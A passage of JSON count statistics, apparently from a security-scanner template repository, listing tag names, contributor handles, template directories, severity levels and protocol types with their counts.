"name":"ilo4","count":1},{"name":"uvdesk","count":1},{"name":"nodebb","count":1},{"name":"clustering","count":1},{"name":"ulterius","count":1},{"name":"lancom","count":1},{"name":"backupbuddy","count":1},{"name":"coinlayer","count":1},{"name":"ipfind","count":1},{"name":"rhymix","count":1},{"name":"clearfy-cache","count":1},{"name":"woody","count":1},{"name":"zebra","count":1},{"name":"zoneminder","count":1},{"name":"global","count":1},{"name":"utility","count":1},{"name":"dropbear","count":1},{"name":"mariadb","count":1},{"name":"moinmoin","count":1},{"name":"openedx","count":1},{"name":"billquick","count":1},{"name":"nweb2fax","count":1},{"name":"alchemy","count":1},{"name":"web-dispatcher","count":1},{"name":"turbocrm","count":1},{"name":"box","count":1},{"name":"hangfire","count":1},{"name":"zenrows","count":1},{"name":"ocean-extra","count":1},{"name":"gurock","count":1},{"name":"dotnetcms","count":1},{"name":"skywalking","count":1},{"name":"aspnuke","count":1},{"name":"easync-booking","count":1},{"name":"pyspider","count":1},{"name":"flowci","count":1},{"name":"proxykingdom","count":1},{"name":"graphiql","count":1},{"name":"nagiosxi","count":1},{"name":"ruoyi","count":1},{"name":"qvidium","count":1},{"name":"pypicloud","count":1},{"name":"pyproject","count":1},{"name":"abbott","count":1},{"name":"securitytrails","count":1},{"name":"phpminiadmin","count":1},{"name":"citybook","count":1},{"name":"landray","count":1},{"name":"acs","count":1},{"name":"anycomment","count":1},{"name":"helpdesk","count":1},{"name":"avigilon","count":1},{"name":"employment","count":1},{"name":"wallix","count":1},{"name":"directions","count":1},{"name":"mspcontrol","count":1},{"name":"htmli","count":1},{"name":"caa","count":1},{"name":"mobile","count":1},{"name":"m-files","count":1},{"name":"fanwei","count":1},{"name":"ioncube","count":1},{"name":"mongoshake","count":1},{"name":"gocron","count":1},{"name":"kaes","count":1},{"name":"event","count":1},{"name":"piluscart","count":1},{"name":"maccmsv10","count":1},{"name":"kodi","count":1},{"name":"trello","count":1},{"name":"opennms","count":1},{"name":"spidercontrol","count":1},{"name":"zap","count":1},{"name":"payroll","count":1},{"name":"tracking","count":1},{"name":"netmask","count":1},{"name":"dwr","count":1},{"name":"adb","count":1},{"name":"shiro","count":1},{"name":"reprise","count":1},{"name":"openethereum","count":1},{"name":"fms","count":1},{"name":"find","count":1},{"name":"labstack","count":1},{"name":"securityspy","count":1},{"name":"tarantella","count":1},{"name":"phabricator","count":1},{"name":"eyoumail","count":1},{"name":"csa","count":1},{"name":"led","count":1},{"name":"turnkey","count":1},{"name":"fontawesome","count":1},{"name":"wpcentral","count":1},{"name":"streetview","count":1},{"name":"monitorix","count":1},{"name":"telecom","count":1},{"name":"cuppa","count":1},{"name":"opnsense","count":1},{"name":"d-link","count":1},{"name":"harvardart","count":1},{"name":"defectdojo","count":1},{"name":"qlik","count":1},{"name":"basic-auth","count":1},{"name":"fhem","count":1},{"name":"smartblog","count":1},{"name":"viaware","count":1},{"name":"avalanche","count":1},{"name":"learnpress","count":1},{"name":"hostio","count":1},{"name":"dapp","count":1},{"name":"webuzo","count":1},{"name":"nerdgraph","count":1},{"name":"nessus","count":1},{"name":"ucs","count":1},{"name":"zoomsounds","count":1},{"name":"zentral","count":1},{"name":"etouch","count":1},{"name":"chinaunicom","count":1},{"name":"acexy","count":1},{"name":"ip2whois","count":1},{"name":"ethereum","count":1},{"name":"nvrmini","count":1},{"name":"myvuehelp","count":1},{"name":"spf","count":1},{"name":"buddypress","count":1},{"name":"elevation","count":1},{"name":"u5cms","count":1},{"name":"jgraph","count":1},{"name":"qts","count":1},{"name":"timeclock","count":1},{"name":"barco","count":1},{"name":"wdja","count":1},{"name":"questdb","count":1},{"name":"portainer","count":1},{"name":"airnotifier","count":1},{"name":"antsword","count":1},{"name":"darktrace","count":1},{"name":"visualstudio","count":1},{"name":"sicom","count":1},{"name":"sentinelone","count":1},{"name":"nuget","count":1},{"name":"nirweb-support","count":1},{"name":"omi","count":1},{"name":"academylms","count":1},{"name":"leostream","count":1},{"name":"officekeeper","count":1},{"name":"awx","count":1},{"name":"clink-office","count":1},{"name":"macaddresslookup","count":1},{"name":"smartgateway","count":1},{"name":"acontent","count":1},{"name":"thinkadmin","count":1},{"name":"monitor","count":1},{"name":"mesos","count":1},{"name":"ucp","count":1},{"name":"emobile","count":1},{"name":"episerver","count":1},{"name":"shopware","count":1},{"name":"qdpm","count":1},{"name":"hdnetwork","count":1},{"name":"powertek","count":1},{"name":"urlscan","count":1},{"name":"dixell","count":1},{"name":"oneblog","count":1},{"name":"knowage","count":1},{"name":"maximo","count":1},{"name":"lokalise","count":1}],"authors":[{"name":"dhiyaneshdk","count":687},{"name":"daffainfo","count":659},{"name":"pikpikcu","count":340},{"name":"pdteam","count":274},{"name":"geeknik","count":196},{"name":"dwisiswant0","count":171},{"name":"0x_akoko","count":169},{"name":"ritikchaddha","count":159},{"name":"pussycat0x","count":157},{"name":"princechaddha","count":153},{"name":"gy741","count":134},{"name":"arafatansari","count":102},{"name":"tess","count":74},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":61},{"name":"akincibor","count":51},{"name":"for3stco1d","count":47},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":31},{"name":"edoardottt","count":28},{"name":"theamanrawat","count":26},{"name":"ice3man","count":26},{"name":"c-sh0","count":26},{"name":"organiccrap","count":24},{"name":"righettod","count":22},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"johnk3r","count":13},{"name":"0ri2n","count":13},{"name":"tenbird","count":13},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"random-robbie","count":12},{"name":"melbadry9","count":12},{"name":"cyllective","count":11},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"dogasantos","count":11},{"name":"nadino","count":10},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"logicalhunter","count":10},{"name":"alph4byt3","count":10},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":9},{"name":"oppsec","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"veshraj","count":8},{"name":"lu4nx","count":8},{"name":"aashiq","count":8},{"name":"caspergn","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"divya_mudgal","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"amit-jd","count":7},{"name":"leovalcante","count":7},{"name":"pathtaga","count":6},{"name":"imnightmaree","count":6},{"name":"puzzlepeaches","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"__fazal","count":6},{"name":"ricardomaia","count":6},{"name":"iamnoooob","count":6},{"name":"nullfuzz","count":6},{"name":"gitlab red team","count":6},{"name":"_0xf4n9x_","count":6},{"name":"pentest_swissky","count":6},{"name":"rootxharsh","count":6},{"name":"evan rubinstein","count":6},{"name":"forgedhallpass","count":6},{"name":"nodauf","count":5},{"name":"yanyun","count":5},{"name":"prajiteshsingh","count":5},{"name":"joanbono","count":5},{"name":"podalirius","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"clem9669","count":5},{"name":"scent2d","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"robotshell","count":4},{"name":"3th1c_yuk1","count":4},{"name":"its0x08","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"dadevel","count":4},{"name":"h1ei1","count":4},{"name":"r3naissance","count":4},{"name":"0xlittleboy","count":4},{"name":"tanq16","count":4},{"name":"e_schultze_","count":4},{"name":"whoever","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"skeltavik","count":3},{"name":"emenalf","count":3},{"name":"lark-lab","count":3},{"name":"alifathi-h1","count":3},{"name":"kh4sh3i","count":3},{"name":"jarijaas","count":3},{"name":"davidmckennirey","count":3},{"name":"impramodsargar","count":3},{"name":"dr0pd34d","count":3},{"name":"shifacyclewala","count":3},{"name":"fxploit","count":3},{"name":"fyoorer","count":3},{"name":"lucasljm2001","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"powerexploit","count":3},{"name":"_generic_human_","count":3},{"name":"swissky","count":3},{"name":"me9187","count":3},{"name":"atomiczsec","count":3},{"name":"f1tz","count":3},{"name":"ph33r","count":3},{"name":"binaryfigments","count":3},{"name":"mr-xn","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"hahwul","count":3},{"name":"z3bd","count":3},{"name":"mavericknerd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"arcc","count":3},{"name":"splint3r7","count":3},{"name":"johnjhacking","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"supras","count":3},{"name":"vavkamil","count":2},{"name":"k11h-de","count":2},{"name":"w4cky_","count":2},{"name":"0xcrypto","count":2},{"name":"pxmme1337","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"canberbamber","count":2},{"name":"d4vy","count":2},{"name":"clarkvoss","count":2},{"name":"cocxanh","count":2},{"name":"danielmofer","count":2},{"name":"n-thumann","count":2},{"name":"ehsahil","count":2},{"name":"badboycxcc","count":2},{"name":"ambassify","count":2},{"name":"luci","count":2},{"name":"8arthur","count":2},{"name":"x1m_martijn","count":2},{"name":"true13","count":2},{"name":"bernardofsr","count":2},{"name":"thardt-praetorian","count":2},{"name":"udit_thakkur","count":2},{"name":"r12w4n","count":2},{"name":"0xrudra","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"github.com/its0x08","count":2},{"name":"brenocss","count":2},{"name":"zomsop82","count":2},{"name":"smaranchand","count":2},{"name":"sbani","count":2},{"name":"lotusdll","count":2},{"name":"ree4pwn","count":2},{"name":"hetroublemakr","count":2},{"name":"hackerarpan","count":2},{"name":"evergreencartoons","count":2},{"name":"cckuakilong","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"moritz nentwig","count":2},{"name":"socketz","count":2},{"name":"dbrwsky","count":2},{"name":"0xsmiley","count":2},{"name":"thezakman","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"fabaff","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"manas_harsh","count":2},{"name":"redteambrasil","count":2},{"name":"ajaysenr","count":2},{"name":"parth","count":2},{"name":"paradessia","count":2},{"name":"0xnirvana","count":2},{"name":"dheerajmadhukar","count":2},{"name":"g4l1t0","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"z0ne","count":2},{"name":"myztique","count":2},{"name":"joshlarsen","count":2},{"name":"0xelkomy","count":2},{"name":"afaq","count":2},{"name":"randomrobbie","count":2},{"name":"sy3omda","count":2},{"name":"gevakun","count":2},{"name":"gal nagli","count":2},{"name":"vsh00t","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kiblyn11","count":2},{"name":"v0idc0de","count":2},{"name":"nvn1729","count":2},{"name":"joeldeleep","count":2},{"name":"taielab","count":2},{"name":"kre80r","count":2},{"name":"bananabr","count":2},{"name":"y4er","count":2},{"name":"bing0o","count":2},{"name":"dahse89","count":2},{"name":"mohammedsaneem","count":2},{"name":"666asd","count":2},{"name":"uomogrande","count":2},{"name":"paperpen","count":2},{"name":"nuk3s3c","count":2},{"name":"raesene","count":2},{"name":"korteke","count":2},{"name":"codexlynx","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"martincodes-de","count":2},{"name":"0xsapra","count":2},{"name":"koti2","count":2},{"name":"geekby","count":2},{"name":"0xprial","count":2},{"name":"huowuzhao","count":2},{"name":"erethon","count":1},{"name":"thebinitghimire","count":1},{"name":"ransomsec","count":1},{"name":"cookiehanhoan","count":1},{"name":"f1she3","count":1},{"name":"udinchan","count":1},{"name":"ldionmarcil","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sec_hawk","count":1},{"name":"retr02332","count":1},{"name":"miroslavsotak","count":1},{"name":"natto97","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"jcockhren","count":1},{"name":"h4kux","count":1},{"name":"jteles","count":1},{"name":"mhdsamx","count":1},{"name":"droberson","count":1},{"name":"sherlocksecurity","count":1},{"name":"jna1","count":1},{"name":"lamscun","count":1},{"name":"brabbit10","count":1},{"name":"ola456","count":1},{"name":"bad5ect0r","count":1},{"name":"petruknisme","count":1},{"name":"ggranjus","count":1},{"name":"djoevanka","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"aringo","count":1},{"name":"jeya seelan","count":1},{"name":"0h1in9e","count":1},{"name":"ahmed sherif","count":1},{"name":"calumjelrick","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"zinminphy0","count":1},{"name":"tim_koopmans","count":1},{"name":"aaronchen0","count":1},{"name":"omarkurt","count":1},{"name":"phyr3wall","count":1},{"name":"alperenkesk","count":1},{"name":"kurohost","count":1},{"name":"skylark-lab","count":1},{"name":"rojanrijal","count":1},{"name":"vinit989","count":1},{"name":"8authur","count":1},{"name":"berkdusunur","count":1},{"name":"deena","count":1},{"name":"infosecsanyam","count":1},{"name":"th3.d1p4k","count":1},{"name":"realexp3rt","count":1},{"name":"evan rubinstien","count":1},{"name":"blckraven","count":1},{"name":"af001","count":1},{"name":"bjhulst","count":1},{"name":"notnotnotveg","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"paper-pen","count":1},{"name":"exploitation","count":1},{"name":"akshansh","count":1},{"name":"arr0way","count":1},{"name":"kailashbohara","count":1},{"name":"sicksec","count":1},{"name":"mesaglio","count":1},{"name":"wabafet","count":1},{"name":"daviey","count":1},{"name":"open-sec","count":1},{"name":"noraj","count":1},{"name":"flag007","count":1},{"name":"amnotacat","count":1},{"name":"b0yd","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"carlosvieira","count":1},{"name":"furkansayim","count":1},{"name":"0xceba","count":1},{"name":"manasmbellani","count":1},{"name":"dk999","count":1},{"name":"hexcat","count":1},{"name":"allenwest24","count":1},{"name":"luqmaan hadia","count":1},{"name":"ipanda","count":1},{"name":"viondexd","count":1},{"name":"0xtavian","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"ofjaaah","count":1},{"name":"rodnt","count":1},{"name":"orpheus","count":1},{"name":"un-fmunozs","count":1},{"name":"kiks7","count":1},{"name":"rotemreiss","count":1},{"name":"duty_1g","count":1},{"name":"failopen","count":1},{"name":"thesubtlety","count":1},{"name":"manuelbua","count":1},{"name":"b0rn2r00t","count":1},{"name":"iphantasmic","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"arall","count":1},{"name":"co0nan","count":1},{"name":"zsusac","count":1},{"name":"x6263","count":1},{"name":"rschio","count":1},{"name":"shiar","count":1},{"name":"pry0cc","count":1},{"name":"retr0","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0xd0ff9","count":1},{"name":"alex","count":1},{"name":"lixts","count":1},{"name":"jrolf","count":1},{"name":"noamrathaus","count":1},{"name":"lingtren","count":1},{"name":"adrianmf","count":1},{"name":"official_blackhat13","count":1},{"name":"anon-artist","count":1},{"name":"jeya.seelan","count":1},{"name":"dawid-czarnecki","count":1},{"name":"toufik-airane","count":1},{"name":"ahmed abou-ela","count":1},{"name":"kabirsuda","count":1},{"name":"0xceeb","count":1},{"name":"evolutionsec","count":1},{"name":"harshinsecurity","count":1},{"name":"queencitycyber","count":1},{"name":"knassar702","count":1},{"name":"patralos","count":1},{"name":"alexrydzak","count":1},{"name":"fopina","count":1},{"name":"luskabol","count":1},{"name":"p-l-","count":1},{"name":"yashgoti","count":1},{"name":"ph33rr","count":1},{"name":"udyz","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"charanrayudu","count":1},{"name":"micha3lb3n","count":1},{"name":"regala_","count":1},{"name":"danigoland","count":1},{"name":"ramkrishna sawant","count":1},{"name":"bartu utku sarp","count":1},{"name":"elmahdi","count":1},{"name":"akash.c","count":1},{"name":"exid","count":1},{"name":"izn0u","count":1},{"name":"s1r1u5_","count":1},{"name":"_c0wb0y_","count":1},{"name":"hanlaomo","count":1},{"name":"intx0x80","count":1},{"name":"theabhinavgaur","count":1},{"name":"streetofhackerr007","count":1},{"name":"iampritam","count":1},{"name":"kr1shna4garwal","count":1},{"name":"remonsec","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"opencirt","count":1},{"name":"hardik-rathod","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"httpvoid","count":1},{"name":"shreyapohekar","count":1},{"name":"2rs3c","count":1},{"name":"viniciuspereiras","count":1},{"name":"coldfish","count":1},{"name":"elouhi","count":1},{"name":"piyushchhiroliya","count":1},{"name":"yashanand155","count":1},{"name":"tehtbl","count":1},{"name":"ringo","count":1},{"name":"igibanez","count":1},{"name":"notsoevilweasel","count":1},{"name":"jbaines-r7","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"yavolo","count":1},{"name":"mantissts","count":1},{"name":"b4uh0lz","count":1},{"name":"tea","count":1},{"name":"d0rkerdevil","count":1},{"name":"bughuntersurya","count":1},{"name":"lethargynavigator","count":1},{"name":"vzamanillo","count":1},{"name":"ilovebinbash","count":1},{"name":"majidmc2","count":1},{"name":"xeldax","count":1},{"name":"compr00t","count":1},{"name":"lrtk-coder","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"prettyboyaaditya","count":1},{"name":"ahmetpergamum","count":1},{"name":"ooooooo_q","count":1},{"name":"soyelmago","count":1},{"name":"exceed","count":1},{"name":"francescocarlucci","count":1},{"name":"thevillagehacker","count":1},{"name":"philippdelteil","count":1},{"name":"aresx","count":1},{"name":"0xh7ml","count":1},{"name":"screamy","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"nielsing","count":1},{"name":"arm!tage","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"1nf1n7y","count":1},{"name":"zandros0","count":1},{"name":"_harleo","count":1},{"name":"wlayzz","count":1},{"name":"geraldino2","count":1},{"name":"ling","count":1},{"name":"kiransau","count":1},{"name":"revblock","count":1},{"name":"andirrahmani1","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"s0obi","count":1},{"name":"tirtha_mandal","count":1},{"name":"arjunchandarana","count":1},{"name":"0xteles","count":1},{"name":"whynotke","count":1},{"name":"davidfegyver","count":1},{"name":"osamahamad","count":1},{"name":"sickwell","count":1},{"name":"_darrenmartyn","count":1},{"name":"maximus decimus","count":1},{"name":"yuansec","count":1},{"name":"elitebaz","count":1},{"name":"c3l3si4n","count":1},{"name":"0xrod","count":1},{"name":"affix","count":1},{"name":"xshuden","count":1},{"name":"couskito","count":1},{"name":"pudsec","count":1},{"name":"shelld3v","count":1},{"name":"dale clarke","count":1},{"name":"ok_bye_now","count":1},{"name":"florianmaak","count":1},{"name":"lark lab","count":1},{"name":"pratik khalane","count":1},{"name":"miryangjung","count":1},{"name":"aayush vishnoi","count":1},{"name":"5up3r541y4n","count":1},{"name":"dievus","count":1},{"name":"qlkwej","count":1},{"name":"momen eldawakhly","count":1},{"name":"pdp","count":1},{"name":"thelicato","count":1},{"name":"gboddin","count":1},{"name":"jas37","count":1},{"name":"husain","count":1},{"name":"jiheon-dev","count":1},{"name":"pascalheidmann","count":1},{"name":"absshax","count":1},{"name":"j33n1k4","count":1},{"name":"narluin","count":1},{"name":"apt-mirror","count":1},{"name":"push4d","count":1},{"name":"act1on3","count":1},{"name":"ohlinge","count":1},{"name":"becivells","count":1},{"name":"sak1","count":1},{"name":"zhenwarx","count":1},{"name":"secthebit","count":1},{"name":"luqman","count":1},{"name":"schniggie","count":1},{"name":"hakimkt","count":1},{"name":"elder tao","count":1},{"name":"andysvints","count":1},{"name":"shockwave","count":1},{"name":"amanrawat","count":1},{"name":"fq_hsu","count":1},{"name":"pjborah","count":1},{"name":"borna nematzadeh","count":1},{"name":"nytr0gen","count":1},{"name":"undefl0w","count":1},{"name":"justmumu","count":1},{"name":"makyotox","count":1},{"name":"shivampand3y","count":1},{"name":"noobexploiter","count":1},{"name":"nerrorsec","count":1},{"name":"mrcl0wnlab","count":1},{"name":"jbertman","count":1},{"name":"ptonewreckin","count":1},{"name":"xstp","count":1},{"name":"mah3sec_","count":1},{"name":"kareemse1im","count":1},{"name":"liquidsec","count":1},{"name":"fmunozs","count":1},{"name":"y0no","count":1},{"name":"mass0ma","count":1},{"name":"rubina119","count":1},{"name":"furkansenan","count":1},{"name":"rotembar","count":1},{"name":"juicypotato1","count":1},{"name":"oscarintherocks","count":1},{"name":"sshell","count":1},{"name":"bywalks","count":1},{"name":"kaizensecurity","count":1},{"name":"w0tx","count":1},{"name":"tirtha","count":1},{"name":"unkl4b","count":1},{"name":"clment cruchet","count":1},{"name":"nagli","count":1},{"name":"dhiyaneshdki","count":1},{"name":"nobody","count":1},{"name":"hakluke","count":1},{"name":"chron0x","count":1},{"name":"alevsk","count":1},{"name":"sinkettu","count":1},{"name":"shifacyclewla","count":1},{"name":"marcos_iaf","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"breno_css","count":1}],"directory":[{"name":"cves","count":1504},{"name":"exposed-panels","count":751},{"name":"vulnerabilities","count":517},{"name":"misconfiguration","count":338},{"name":"technologies","count":306},{"name":"exposures","count":300},{"name":"token-spray","count":235},{"name":"workflows","count":190},{"name":"default-logins","count":113},{"name":"file","count":77},{"name":"takeovers","count":68},{"name":"network","count":56},{"name":"iot","count":40},{"name":"cnvd","count":25},{"name":"miscellaneous","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1618},{"name":"high","count":1135},{"name":"medium","count":822},{"name":"critical","count":540},{"name":"low","count":260},{"name":"unknown","count":23}],"types":[{"name":"http","count":4218},{"name":"file","count":77},{"name":"network","count":70},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1538},{"name":"panel","count":755},{"name":"edb","count":578},{"name":"xss","count":537},{"name":"exposure","count":536},{"name":"lfi","count":519},{"name":"wordpress","count":465},{"name":"cve2021","count":366},{"name":"wp-plugin","count":360},{"name":"tech","count":349},{"name":"rce","count":345},{"name":"packetstorm","count":291},{"name":"cve2022","count":262},{"name":"wpscan","count":252},{"name":"token-spray","count":235},{"name":"misconfig","count":221},{"name":"cve2020","count":221},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":182},{"name":"kev","count":167},{"name":"config","count":163},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":130},{"name":"oast","count":127},{"name":"apache","count":126},{"name":"iot","count":123},{"name":"authenticated","count":118},{"name":"sqli","count":115},{"name":"cve2010","count":111},{"name":"redirect","count":90},{"name":"router","count":90},{"name":"files","count":89},{"name":"login","count":88},{"name":"network","count":76},{"name":"devops","count":75},{"name":"takeover","count":74},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":65},{"name":"file","count":65},{"name":"oracle","count":62},{"name":"intrusive","count":59},{"name":"install","count":58},{"name":"seclists","count":57},{"name":"disclosure","count":56},{"name":"oss","count":51},{"name":"cisco","count":49},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"vulhub","count":38},{"name":"atlassian","count":38},{"name":"vmware","count":38},{"name":"logs","count":37},{"name":"traversal","count":35},{"name":"springboot","count":35},{"name":"tenable","count":35},{"name":"hackerone","count":34},{"name":"injection","count":33},{"name":"jira","count":32},{"name":"listing","count":31},{"name":"debug","count":30},{"name":"kubernetes","count":29},{"name":"huntr","count":29},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"sap","count":25},{"name":"microsoft","count":25},{"name":"cnvd","count":25},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"misc","count":23},{"name":"aws","count":22},{"name":"php","count":22},{"name":"fuzz","count":21},{"name":"zoho","count":21},{"name":"wp-theme","count":21},{"name":"manageengine","count":21},{"name":"cloud","count":20},{"name":"cve2012","count":20},{"name":"weblogic","count":20},{"name":"ibm","count":19},{"name":"tomcat","count":19},{"name":"camera","count":19},{"name":"cicd","count":19},{"name":"k8s","count":19},{"name":"api","count":19},{"name":"deserialization","count":19},{"name":"dlink","count":18},{"name":"gitlab","count":18},{"name":"service","count":17},{"name":"firewall","count":17},{"name":"wavlink","count":17},{"name":"jenkins","count":17},{"name":"struts","count":16},{"name":"printer","count":16},{"name":"ftp","count":16},{"name":"cve2011","count":15},{"name":"xxe","count":15},{"name":"cve2009","count":15},{"name":"nginx","count":15},{"name":"fortinet","count":14},{"name":"java","count":14},{"name":"hp","count":14},{"name":"android","count":14},{"name":"domainmod","count":14},{"name":"msf","count":13},{"name":"lfr","count":13},{"name":"magento","count":13},{"name":"amazon","count":13},{"name":"cve2013","count":13},{"name":"abstractapi","count":13},{"name":"woocommerce","count":13},{"name":"confluence","count":13},{"name":"status","count":13},{"name":"netsweeper","count":12},{"name":"drupal","count":12},{"name":"rails","count":12},{"name":"ruijie","count":12},{"name":"graphql","count":12},{"name":"netgear","count":12},{"name":"backup","count":12},{"name":"microweber","count":12},{"name":"cve2008","count":12},{"name":"github","count":12},{"name":"ssl","count":11},{"name":"airflow","count":11},{"name":"cisa","count":11},{"name":"azure","count":11},{"name":"vpn","count":11},{"name":"mail","count":11},{"name":"backdoor","count":11},{"name":"webserver","count":11},{"name":"fortigate","count":11},{"name":"cnvd2021","count":11},{"name":"glpi","count":10},{"name":"grafana","count":10},{"name":"git","count":10},{"name":"laravel","count":10},{"name":"ruby","count":10},{"name":"coldfusion","count":10},{"name":"zyxel","count":10},{"name":"django","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"dell","count":10},{"name":"iis","count":9},{"name":"zimbra","count":9},{"name":"fastjson","count":9},{"name":"wso2","count":9},{"name":"kube","count":9},{"name":"prometheus","count":9},{"name":"phpmyadmin","count":9},{"name":"dedecms","count":9},{"name":"ssti","count":9},{"name":"windows","count":9},{"name":"zabbix","count":9},{"name":"vcenter","count":9},{"name":"sonicwall","count":9},{"name":"audit","count":8},{"name":"auth","count":8},{"name":"config-audit","count":8},{"name":"recon","count":8},{"name":"cisco-switch","count":8},{"name":"headless","count":8},{"name":"metadata","count":8},{"name":"elasticsearch","count":8},{"name":"jboss","count":8},{"name":"citrix","count":8},{"name":"solarview","count":8},{"name":"kafka","count":8},{"name":"scada","count":8},{"name":"mirai","count":8},{"name":"hms","count":8},{"name":"solr","count":8},{"name":"blind","count":7},{"name":"exchange","count":7},{"name":"druid","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"squirrelmail","count":7},{"name":"jetbrains","count":7},{"name":"firebase","count":7},{"name":"samsung","count":7},{"name":"symfony","count":7},{"name":"go","count":7},{"name":"opencats","count":7},{"name":"icewarp","count":7},{"name":"docker","count":7},{"name":"maps","count":7},{"name":"npm","count":7},{"name":"bucket","count":7},{"name":"seeyon","count":7},{"name":"python","count":7},{"name":"cnvd2020","count":7},{"name":"rconfig","count":6},{"name":"crlf","count":6},{"name":"jamf","count":6},{"name":"fpd","count":6},{"name":"enum","count":6},{"name":"huawei","count":6},{"name":"zhiyuan","count":6},{"name":"microstrategy","count":6},{"name":"sitecore","count":6},{"name":"cache","count":6},{"name":"ognl","count":6},{"name":"kubelet","count":6},{"name":"smtp","count":6},{"name":"bypass","count":6},{"name":"opensis","count":6},{"name":"moodle","count":6},{"name":"artica","count":6},{"name":"ssh","count":6},{"name":"db","count":6},{"name":"openvpn","count":6},{"name":"setup","count":6},{"name":"emerge","count":6},{"name":"ofbiz","count":6},{"name":"node","count":6},{"name":"lucee","count":6},{"name":"jetty","count":6},{"name":"magmi","count":6},{"name":"vms","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"cobbler","count":6},{"name":"ecology","count":6},{"name":"bigip","count":6},{"name":"slack","count":6},{"name":"activemq","count":6},{"name":"alibaba","count":5},{"name":"prestashop","count":5},{"name":"symantec","count":5},{"name":"fatpipe","count":5},{"name":"plesk","count":5},{"name":"parallels","count":5},{"name":"elfinder","count":5},{"name":"solarwinds","count":5},{"name":"carrental","count":5},{"name":"mongodb","count":5},{"name":"rfi","count":5},{"name":"storage","count":5},{"name":"cockpit","count":5},{"name":"awstats","count":5},{"name":"error","count":5},{"name":"firmware","count":5},{"name":"metinfo","count":5},{"name":"filemanager","count":5},{"name":"rseenet","count":5},{"name":"avideo","count":5},{"name":"apisix","count":5},{"name":"admin","count":5},{"name":"elastic","count":5},{"name":"redis","count":5},{"name":"scan","count":5},{"name":"leak","count":5},{"name":"circarlife","count":5},{"name":"gocd","count":5},{"name":"strapi","count":5},{"name":"gogs","count":5},{"name":"nagios","count":5},{"name":"database","count":5},{"name":"minio","count":5},{"name":"74cms","count":5},{"name":"keycloak","count":5},{"name":"thinkphp","count":5},{"name":"fortios","count":5},{"name":"jellyfin","count":4},{"name":"royalevent","count":4},{"name":"couchdb","count":4},{"name":"kibana","count":4},{"name":"resin","count":4},{"name":"